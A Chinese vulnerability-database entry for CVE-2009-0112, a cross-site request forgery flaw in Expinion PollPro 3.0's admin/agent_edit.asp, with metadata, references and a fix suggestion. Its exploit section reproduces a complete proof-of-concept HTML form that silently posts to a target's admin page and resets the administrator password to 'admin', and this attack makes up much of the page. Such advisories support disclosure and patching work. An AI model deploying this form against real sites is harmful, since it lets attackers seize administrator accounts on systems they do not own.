expinion poll_pro 脚本agent_edit.asp 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184136 漏洞类型 跨站请求伪造
发布时间 2009-01-09 更新时间 2009-01-09
CVE编号 CVE-2009-0112 CNNVD-ID CNNVD-200901-101
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/84361
https://cxsecurity.com/issue/WLB-2009010011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-101
|漏洞详情
PollPro3.0版本中的admin/agent_edit.asp存在跨站请求伪造漏洞。远程攻击者可以借助用户名、密码和名字参数,以管理员的身份创建或修改帐户。
|漏洞EXP
 < ------------------- header data start ------------------- >

#############################################################

# Application Name     : PollPro

# Vulnerable Type     : XSRF

# Infection          : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice     : Form&#8217;a Oturum Key&#8217;i (Session Token) eklenmeli, eski &#351;ifre sorulmal&#305;d&#305;r.

# author          : The_0nur-n0x

#############################################################

< ------------------- header data end of ------------------- >
<tr>
<th0x>
        <td>
          <br />
          <form action="http://Site.net/PATH/admin/agent_edit.asp?ID=USERID" name="frm" method="post" onSubmit="return Th30nur()">
                <table cellpadding="2" cellspacing="0" border="0" align="center"><tr>
                        <td>Username:</td>
                        <td><input style="width: 400px;" type="Text" disabled="disabled" name="username" value="admin" size="45" maxlength="25" class="textbox" /></td>
                </tr><tr>
                        <td>Password:</td>
                        <td><input style="width: 400px;" type="Password" name="password" size="45" value="admin" maxlength="25" class="textbox" /></td>
                </tr><tr>
                        <td>Name:</td>
                        <td><input style="width: 400px;" type="Text" name="name" size="45" value="Admin User" maxlength="80" class="textbox" /></td>
                </tr><tr>
                        <td>Enabled:</td>
                        <td><input type="Checkbox" name="enable" checked value="1" /></td>
                </tr><tr>
                        <td colspan="2" align="right"><br /><input type="Submit" value="Update" /></td>
                </tr></table>
                <input type="Hidden" name="mode" value="edit" />
          </form>
          <br />
        </td>
    </tr></table></th0x>
|受影响的产品
Expinion Poll Pro 3.0
|参考资料

来源:SREASON
名称:4895
链接:http://securityreason.com/securityalert/4895
来源:SECUNIA
名称:33319
链接:http://secunia.com/advisories/33319
来源:BUGTRAQ
名称:20090103PollPro3.0XSRFVuLn
链接:http://marc.info/?l=bugtraq&m=123117044713213&w=2